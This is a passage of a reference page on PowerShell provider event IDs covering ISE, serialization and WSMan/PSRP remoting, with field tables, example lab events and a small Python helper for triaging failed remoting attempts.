"ActivityID": "E345B8F4-8ABD-45C2-9C94-77A035AE705C"
},
"execution": {
"process_id": 8572,
"thread_id": 13812
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "LAB-DC01.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"param1": "Closing"
},
"message": ""
}
Event ID 8198: Attempting session creation retry param1 for error code param2 on session Id param3.
Event ID 12033: Port resolved to param1.
Event ID 12034: AppName resolved to param1.
Event ID 12035: ComputerName resolved to param1.
Event ID 12036: Scheme is param1.
Event ID 12038: Connection Paramters are Connection URI: Connection_URI Resource URI: Resource_URI User: User OpenTimeout: OpenTimeout IdleTimeout: IdleTimeout CancelTimeout: CancelTimeout AuthenticationMechanism:...
#Description
Connection Paramters are.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| uri | UnicodeString | |
| shell | UnicodeString | |
| userName | UnicodeString | |
| opentimeout | UnicodeString | |
| idletimeout | UnicodeString | |
| canceltimeout | UnicodeString | |
| auth | UInt32 | Known values |
| thumbPrint | UnicodeString | |
| redircount | UnicodeString | |
| recvdDataSize | UnicodeString | |
| recvdObjSize | UnicodeString | |
Event ID 12039: Modifying activity Id and correlating
#Description
Modifying activity Id and correlating.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| async)12039_V1( | | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 12039,
"version": 1,
"level": 4,
"task": 0,
"opcode": 20,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9782673+00:00",
"event_record_id": 292351,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 1496
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "Modifying activity Id and correlating"
}
Event ID 16385: AmsiUtil state.
#Description
AmsiUtil state.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| Action | UnicodeString | |
| AmsiContext | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 16385,
"version": 1,
"level": 5,
"task": 130,
"opcode": 20,
"keywords": "0x4000000000000400",
"time_created": "2026-06-02T04:29:48.009+00:00",
"event_record_id": 0,
"correlation": {},
"execution": {
"process_id": 12528,
"thread_id": 15844
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"Action": "init-False",
"AmsiContext": "1776513328784-26365"
},
"message": "Amsi"
}
Event ID 24577: Windows PowerShell ISE has started to run script file FileName.
Event ID 24578: Windows PowerShell ISE has started to run a user-selected script from file FileName.
Event ID 24579: Windows PowerShell ISE is stopping the current command.
#Description
Windows PowerShell ISE is stopping the current command.
Message #
Event ID 24580: Windows PowerShell ISE is resuming the debugger.
#Description
Windows PowerShell ISE is resuming the debugger.
Message #
Event ID 24581: Windows PowerShell ISE is stopping the debugger.
#Description
Windows PowerShell ISE is stopping the debugger.
Message #
Event ID 24582: Windows PowerShell ISE is stepping into debugging.
#Description
Windows PowerShell ISE is stepping into debugging.
Message #
Event ID 24583: Windows PowerShell ISE is stepping over debugging.
#Description
Windows PowerShell ISE is stepping over debugging.
Message #
Event ID 24584: Windows PowerShell ISE is stepping out of debugging.
#Description
Windows PowerShell ISE is stepping out of debugging.
Message #
Event ID 24592: Windows PowerShell ISE is enabling all breakpoints.
#Description
Windows PowerShell ISE is enabling all breakpoints.
Message #
Event ID 24593: Windows PowerShell ISE is disabling all breakpoints.
#Description
Windows PowerShell ISE is disabling all breakpoints.
Message #
Event ID 24594: Windows PowerShell ISE is removing all breakpoints.
#Description
Windows PowerShell ISE is removing all breakpoints.
Message #
Event ID 24595: Windows PowerShell ISE is setting the breakpoint at line #: CurrentLine of file FileName.
Event ID 24596: Windows PowerShell ISE is removing the breakpoint on line #: CurrentLine of file FileName.
Event ID 24597: Windows PowerShell ISE is enabling the breakpoint on line #: CurrentLine of file FileName.
Event ID 24598: Windows PowerShell ISE is disabling the breakpoint on line #: CurrentLine of file FileName.
Event ID 24599: Windows PowerShell ISE has hit a breakpoint on line #: CurrentLine of file FileName.
Event ID 28673: Successfully rehydrated an object.
#Description
Successfully rehydrated an object.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| DeserializedType | UnicodeString | |
| CastedToType | UnicodeString | |
| RehydratedType | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 28673,
"version": 1,
"level": 5,
"task": 3,
"opcode": 23,
"keywords": "0x4000000000000040",
"time_created": "2026-06-02T04:29:48.126+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"CastedToType": "Microsoft.PowerShell.DeserializingTypeConverter",
"DeserializedType": "Deserialized.System.Management.Automation.PSPrimitiveDictionary@@@Deserialized.System.Collections.Hashtable@@@Deserialized.System.Object",
"RehydratedType": "System.Management.Automation.PSPrimitiveDictionary"
},
"message": "Serialization"
}
Event ID 28674: Failed to rehydrated an object.
Event ID 28675: Serialization depth has been overriden.
Event ID 28676: Serialization mode has been overriden.
Event ID 28677: Serialization of a script property has been skipped, because there is no runspace to use for evaluation of the property.
Event ID 28678: Serialization of a property has been skipped, because property getter failed.
Event ID 28679: Serialization of an enumerable object might not be complete, because object being enumerated threw an exception.
Event ID 28680: Serialization called object's ToString method which failed.
Event ID 28682: Maximum depth below top level has been reached, forcing object to be serialized as strings.
Event ID 28683: XmlException has been thrown by the deserializer (most likely indicating incorrect clixml format).
Event ID 28684: Serialization of specified properties failed, because one of the specified properties was missing.
Event ID 32769: Received object with Runspace Id: Runspace_InstanceId Command Id: PowerShell_InstanceId Destination: Destination DataType: DataType TargetInterface: TargetInterface.
#Description
Received object with Runspace Id: Runspace_InstanceId Command Id: PowerShell_InstanceId Destination: Destination DataType: DataType TargetInterface: TargetInterface.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| Runspace_InstanceId | UnicodeString | |
| PowerShell_InstanceId | UnicodeString | |
| Destination | UInt32 | Known values |
| DataType | UInt32 | Known values |
| TargetInterface | UInt32 | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32769,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.018+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataType": 65538,
"Destination": 2,
"PowerShell_InstanceId": "00000000-0000-0000-0000-000000000000",
"Runspace_InstanceId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569",
"TargetInterface": 1
},
"message": "win:None"
}
Event ID 32775: An unhandled exception occurred in the appdomain.
#Event ID 32776: Runspace Id: SessionId Pipeline Id: PipelineId.
#Event ID 32777: An unhandled exception occurred in the appdomain.
#Event ID 32784: Runspace Id: SessionId Pipeline Id: PipelineId.
#Description
Runspace Id: SessionId Pipeline Id: PipelineId. WSMan reported an error with error code: ErrorCode. Raised when the WSMan transport reports an error for the session; the example is the client side of an outbound connection that never succeeded. ErrorCode is the HRESULT as a signed 32-bit decimal (the example's -2144108101 is 0x803381BB) and ErrorMessage names the target, so the Operational log keeps a record of attempted PowerShell remoting from this host even when no session was established. Here the target was a bare IP address, which WinRM refuses with default authentication unless the transport is HTTPS or the destination is in TrustedHosts and explicit credentials are supplied.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString | |
ErrorCode UnicodeString | |
ErrorMessage UnicodeString | |
StackTrace UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "A0C1853B-5C40-4B15-8766-3CF1C58F985A",
"event_source_name": "",
"event_id": 32784,
"version": 1,
"level": 2,
"task": 0,
"opcode": 10,
"keywords": 0,
"time_created": "2026-03-13T19:48:48.051299+00:00",
"event_record_id": 692957,
"correlation": {
"ActivityID": "0DB6BBF5-303D-4E93-8DE3-887C047E8B68"
},
"execution": {
"process_id": 1512,
"thread_id": 1452
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "LAB-DC01.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"SessionId": "0db6bbf5-303d-4e93-8de3-887c047e8b68",
"PipelineId": "00000000-0000-0000-0000-000000000000",
"ErrorCode": "-2144108101",
"ErrorMessage": "Connecting to remote server 10.2.10.21 failed with the following error message : The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more information on how to set TrustedHosts run the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.",
"StackTrace": ""
},
"message": ""
}
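A triage helper for 32784 records, added here as an example and not code from the page or from PowerShell. It reads the JSON shape shown above, converts the signed ErrorCode to the 0x-form HRESULT, pulls the target out of ErrorMessage and notes whether it is an IP literal and whether the failure was the TrustedHosts rejection. The sample record is a trimmed copy of the example event above; the function names, the WSMAN_FACILITY constant and the output keys are this example's own.

```python
import ipaddress
import json
import re

# Constructed sample, trimmed from the 32784 example event on this page to the
# fields the triage reads.
SAMPLE_32784 = json.loads(r'''{
  "system": {"event_id": 32784, "computer": "LAB-DC01.ludus.domain",
             "security": {"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"}},
  "event_data": {
    "SessionId": "0db6bbf5-303d-4e93-8de3-887c047e8b68",
    "PipelineId": "00000000-0000-0000-0000-000000000000",
    "ErrorCode": "-2144108101",
    "ErrorMessage": "Connecting to remote server 10.2.10.21 failed with the following error message : The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts.",
    "StackTrace": ""
  }
}''')

TARGET_RE = re.compile(r"Connecting to remote server (\S+) failed")
WSMAN_FACILITY = 0x33  # WSMan HRESULTs are 0x8033xxxx (assumed constant name)


def hresult_hex(error_code):
    """ErrorCode is the HRESULT rendered as a signed 32-bit decimal string; return
    it in the unsigned 0x-form used in WinRM documentation, or None if absent."""
    if error_code in (None, ""):
        return None
    return "0x%08X" % (int(error_code) & 0xFFFFFFFF)


def hresult_facility(error_code):
    """Facility field of the HRESULT (bits 16-26); 0x33 marks a WSMan error."""
    return ((int(error_code) & 0xFFFFFFFF) >> 16) & 0x7FF


def is_ip_literal(host):
    """True for a bare IPv4/IPv6 address (IPv6 may be bracketed in a URI)."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def triage_wsman_error(event):
    """Summarise one 32784 record: who tried to reach what from where, and why it failed."""
    data = event["event_data"]
    msg = data.get("ErrorMessage", "")
    match = TARGET_RE.search(msg)
    target = match.group(1) if match else None
    code = data.get("ErrorCode")
    return {
        "source_host": event["system"]["computer"],
        "user_sid": event["system"]["security"]["user_id"],
        "session_id": data.get("SessionId"),
        "target": target,
        "target_is_ip": bool(target) and is_ip_literal(target),
        "hresult": hresult_hex(code),
        "wsman_error": bool(code) and hresult_facility(code) == WSMAN_FACILITY,
        "trusted_hosts_rejection": "TrustedHosts" in msg,
    }


if __name__ == "__main__":
    print(json.dumps(triage_wsman_error(SAMPLE_32784), indent=2))
```

Run over an export of the Operational channel filtered to event_id 32784, the output gives one row per failed remoting attempt with the initiating SID and the destination, which is the view needed to spot a workstation or service account probing hosts by IP address.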
Event ID 32785: Runspace Id param1.
#Description
Runspace Id param1. Establishing a connection using WSMan Create Shell.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32785,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.150+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": ""
},
"message": "win:None"
}
Event ID 32786: Runspace Id param1.
#Event ID 32787: Runspace Id: RunspaceId.
#Event ID 32788: Runspace Id: RunspaceId.
#Event ID 32789: Runspace Id: SessionId Pipeline Id: PipelineId.
#Description
Runspace Id: SessionId Pipeline Id: PipelineId. Sending data of size DataSize.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString | |
DataSize UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32789,
"version": 1,
"level": 4,
"task": 0,
"opcode": 21,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.128+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataSize": "2480",
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32790: Runspace Id: SessionId Pipeline Id: PipelineId.
#Description
Runspace Id: SessionId Pipeline Id: PipelineId. Callback received for WSManSendShellInputEx.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32790,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.126+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "00000000-0000-0000-0000-000000000000",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32791: Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id.
#Event ID 32792: Runspace Id: SessionId Pipeline Id: PipelineId.
#Description
Runspace Id: SessionId Pipeline Id: PipelineId. Received Data of size DataSize.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString | |
DataSize UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32792,
"version": 1,
"level": 4,
"task": 0,
"opcode": 22,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.022+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataSize": "223",
"PipelineId": "00000000-0000-0000-0000-000000000000",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32793: Runspace Id SessionId Pipeline Id PipelineId.
#Description
Runspace Id SessionId Pipeline Id PipelineId. Establishing a command connection using WSManRunShellCommandEx.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32793,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.127+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 8196
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32800: Runspace Id SessionId Pipeline Id PipelineId.
#Description
Runspace Id SessionId Pipeline Id PipelineId. Callback received for command connection.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32800,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.128+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32801: Runspace Id: SessionId Pipeline Id: PipelineId.
#Description
Runspace Id: SessionId Pipeline Id: PipelineId. Closing transport for command.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32801,
"version": 1,
"level": 4,
"task": 0,
"opcode": 13,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.131+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 9420
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32802: Runspace Id: SessionId Pipeline Id: PipelineId.
#Description
Runspace Id: SessionId Pipeline Id: PipelineId. Callback received for command close.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32802,
"version": 1,
"level": 4,
"task": 0,
"opcode": 13,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.131+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32803: Runspace Id: Runspace_Id Pipeline Id SessionId.
#Event ID 32804: Runspace Id: Runspace_Id Pipeline Id SessionId.
#Event ID 32805: Runspace Id: SessionId.
#Event ID 32849: Runspace Id: Runspace_InstanceId Pipeline Id: PowerShell_InstanceId.
#Description
Runspace Id: Runspace_InstanceId Pipeline Id: PowerShell_InstanceId. Server is sending data of size DataSize to client. DataType: DataType TargetInterface: TargetInterface. In the example, DataSize 223 is the 202-byte SESSION_CAPABILITY message shown in the 32868 example plus the 21-byte PSRP fragment header (ObjectId 8, FragmentId 8, flags 1, blob length 4), and the client-side 32792 event from the same exchange reports the same 223 bytes received.
Message #
Fields #
| Name | Description |
|---|---|
Runspace_InstanceId UnicodeString | |
PowerShell_InstanceId UnicodeString | |
DataSize UnicodeString | Bytes sent to the client, i.e. the fragment including its header |
DataType UInt32 | Known values: the PSRP message type; 65538 = 0x00010002 = SESSION_CAPABILITY |
TargetInterface UInt32 | Known values: 1 = Session, 2 = RunspacePool, 3 = PowerShell |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32849,
"version": 1,
"level": 4,
"task": 0,
"opcode": 21,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.022+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataSize": "223",
"DataType": 65538,
"PowerShell_InstanceId": "00000000-0000-0000-0000-000000000000",
"Runspace_InstanceId": "00000000-0000-0000-0000-000000000000",
"TargetInterface": 1
},
"message": "win:None"
}
Event ID 32850: Request param1.
#Event ID 32851: Reporting context for request: param1 Context Reported: param2.
#Description
Reporting context for request: param1 Context Reported: param2.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32851,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.158+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0001-EB9A-828753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 19268
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "System.Management.Automation.Remoting.Client.WSManNativeApi+WSManPluginRequest",
"param2": "System.Management.Automation.Remoting.Client.WSManNativeApi+WSManPluginRequest"
},
"message": "win:None"
}
Event ID 32852: Reporting operation complete for request: param1.
#Description
Reporting operation complete for request: param1. The example reports NoError in param2 with param3 and param4 empty.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString | |
param3 UnicodeString | |
param4 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32852,
"version": 1,
"level": 4,
"task": 0,
"opcode": 11,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.150+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "System.Management.Automation.Remoting.Client.WSManNativeApi+WSManPluginRequest",
"param2": "NoError",
"param3": "",
"param4": ""
},
"message": "win:None"
}
Event ID 32853: Shell Context param1.
#Description
Shell Context param1. Request Id param2. Creating a commonad session for running a command.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32853,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.150+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "",
"param2": "CreateCommand: Create a new command in the shell context completed"
},
"message": "win:None"
}
Event ID 32854: Shell Context param1 Command Context param2 Request Id param3.
#Event ID 32855: Shell Context param1 Command Context param2 Request Id param3.
#Description
Shell Context param1 Command Context param2 Request Id param3. Received data from client.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString | |
param3 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32855,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.161+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "",
"param2": "PerformWSManPluginReceive: Invoked",
"param3": ""
},
"message": "win:None"
}
Event ID 32856: Shell Context param1 Command Context param2 Request Id param3.
#Description
Shell Context param1 Command Context param2 Request Id param3. Client sent a receive request so that server can send data.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString | |
param3 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32856,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.161+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "",
"param2": "EnableShellOrCommandToSendDataToClient: unlock the shell / command specified so that the shell / command starts sending data to the client.",
"param3": ""
},
"message": "win:None"
}
Event ID 32857: Shell Context param1 Command Context param2 IsReceiveOperation param3.
#Event ID 32865: Loading assembly param1 for custom shell with shell Id param2.
#Event ID 32866: Loading type param1 for custom shell with shell Id param2.
#Event ID 32867: Received remoting fragment.
#Description
Received remoting fragment. The examples for this event and 32868 come from a live ETW trace (channel "ETW Trace", Level 5, keyword 0x4000000000000008), not from the Operational log. ObjectId, FragmentId, sFlag (start) and eFlag (end) are the PSRP fragment header; FragmentLength and FragmentPayload are the fragment's blob as a byte count and as 0x-prefixed hex. A blob that completes an object is a whole PSRP message: Destination and MessageType as little-endian uint32, the runspace pool and pipeline GUIDs, then the CLIXML data. On the server side this is where the CREATE_PIPELINE messages carrying the client's commands are visible, which makes the trace useful for reconstructing what a remote session ran.
Message #
Fields #
| Name | Description |
|---|---|
ObjectId Int64 | |
FragmentId Int64 | |
sFlag Int32 | Known values: 1 = start fragment of the object (S bit), 0 = continuation |
eFlag Int32 | Known values: 1 = end fragment of the object (E bit), 0 = more fragments follow |
FragmentLength UInt32 | |
FragmentPayload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32867,
"version": 1,
"level": 5,
"task": 0,
"opcode": 22,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:47.999+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"FragmentId": 0,
"FragmentLength": 752,
"FragmentPayload": "...",
"ObjectId": 17,
"eFlag": 1,
"sFlag": 1
},
"message": "win:None"
}
Event ID 32868: Sent remoting fragment.
#Description
Sent remoting fragment. Same fields as 32867. The example's 202-byte payload decodes as Destination 1 (client), MessageType 0x00010002 (SESSION_CAPABILITY, the DataType 65538 reported by 32849 for the same process), two all-zero GUIDs, a UTF-8 BOM and a CLIXML object announcing protocolversion 2.3, PSVersion 2.0 and SerializationVersion 1.1.0.1. The fragment header itself (ObjectId, FragmentId, S/E flags, blob length) is carried in the event's other fields, not in the payload.
Message #
Fields #
